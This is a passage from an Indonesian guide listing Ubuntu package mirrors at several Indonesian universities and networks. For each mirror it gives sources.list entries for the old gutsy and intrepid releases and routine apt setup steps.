## INI UNTUK MAJOR BUG FIX UPDATES
deb http://komo.vlsm.org/ubuntu gutsy-updates main restricted universe multiverse
deb-src http://komo.vlsm.org/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://komo.vlsm.org/ubuntu gutsy-security main restricted universe multiverse
deb-src http://komo.vlsm.org/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.komo
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.komo /etc/apt/sources.list
sudo apt-get update

Repositori IndikaNet (OpenIXP)
Informasi situs: http://indika.net.id

### sources.list.indika
### Repository dengan menggunakan server mirror ubuntu.indika.net.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://ubuntu.indika.net.id/ gutsy main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://ubuntu.indika.net.id/ gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://ubuntu.indika.net.id/ gutsy-security main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.indika
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.indika /etc/apt/sources.list
sudo apt-get update

Repositori ITB (Network ITB & Inherent) – FTP only
Informasi situs: ftp://ftp.itb.ac.id

### sources.list.ftpitb
### Repository dengan menggunakan server mirror ftp.itb.ac.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb ftp://ftp.itb.ac.id/pub/ubuntu gutsy main restricted universe multiverse
deb-src ftp://ftp.itb.ac.id/pub/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb ftp://ftp.itb.ac.id/pub/ubuntu gutsy-updates main restricted universe multiverse
deb-src ftp://ftp.itb.ac.id/pub/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb ftp://ftp.itb.ac.id/pub/ubuntu gutsy-security main restricted universe multiverse
deb-src ftp://ftp.itb.ac.id/pub/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.ftpitb
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.ftpitb /etc/apt/sources.list
sudo apt-get update

Repositori UGM (Inherent)
Informasi situs: http://info.ugm.ac.id dan http://repo.ugm.ac.id/

### sources.list.ugm
### Repository dengan menggunakan server mirror repo.ugm.ac.id
### Untuk saat ini repo.ugm.ac.id hanya tersedia dist gutsy saja
## REPOSITORY UTAMA
deb http://repo.ugm.ac.id/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://repo.ugm.ac.id/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://repo.ugm.ac.id/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.ugm
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.ugm /etc/apt/sources.list
sudo apt-get update

Repositori FOSS-ID (Telkom)
Informasi situs: http://www.foss-id.web.id

### sources.list.foss-id
### Repository dengan menggunakan server mirror foss-id.web.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://dl2.foss-id.web.id/ubuntu gutsy main restricted universe multiverse
deb-src http://dl2.foss-id.web.id/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://dl2.foss-id.web.id/ubuntu gutsy-updates main restricted universe multiverse
deb-src http://dl2.foss-id.web.id/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://dl2.foss-id.web.id/ubuntu gutsy-security main restricted universe multiverse
deb-src http://dl2.foss-id.web.id/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.foss-id
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.foss-id /etc/apt/sources.list
sudo apt-get update

Repositori ITS (Inherent)
Informasi situs: http://mirror.its.ac.id/

### sources.list.its
### Repository dengan menggunakan server mirror mirror.its.ac.id
## REPOSITORY UTAMA
deb http://mirror.its.ac.id/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://mirror.its.ac.id/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://mirror.its.ac.id/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.its
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.its /etc/apt/sources.list
sudo apt-get update

Repository UNEJ (OpenIXP, Telkom)
Informasi situs: http://mirror.unej.ac.id/

### sources.list.unej
deb http://mirror.unej.ac.id/ubuntu/ intrepid main restricted universe multiverse
deb-src http://mirror.unej.ac.id/ubuntu/ intrepid main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb-src http://mirror.unej.ac.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu/ intrepid-security main restricted universe multiverse
deb-src http://mirror.unej.ac.id/ubuntu/ intrepid-security main restricted universe multiverse

Cara penggunaan:

wget http://mirror.unej.ac.id/doc/sources.list-ubuntu.intrepid
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list-ubuntu.intrepid /etc/apt/sources.list
sudo apt-get update

Repository KLAS (IIXJI, Radnet)
Informasi situs: http://buaya.klas.or.id/

### sources.list.buaya
deb http://buaya.klas.or.id/ubuntu/ intrepid main restricted universe multiverse
deb-src http://buaya.klas.or.id/ubuntu/ intrepid main restricted universe multiverse
deb http://buaya.klas.or.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb-src http://buaya.klas.or.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb http://buaya.klas.or.id/ubuntu/ intrepid-security main restricted universe multiverse
deb-src http://buaya.klas.or.id/ubuntu/ intrepid-security main restricted universe multiverse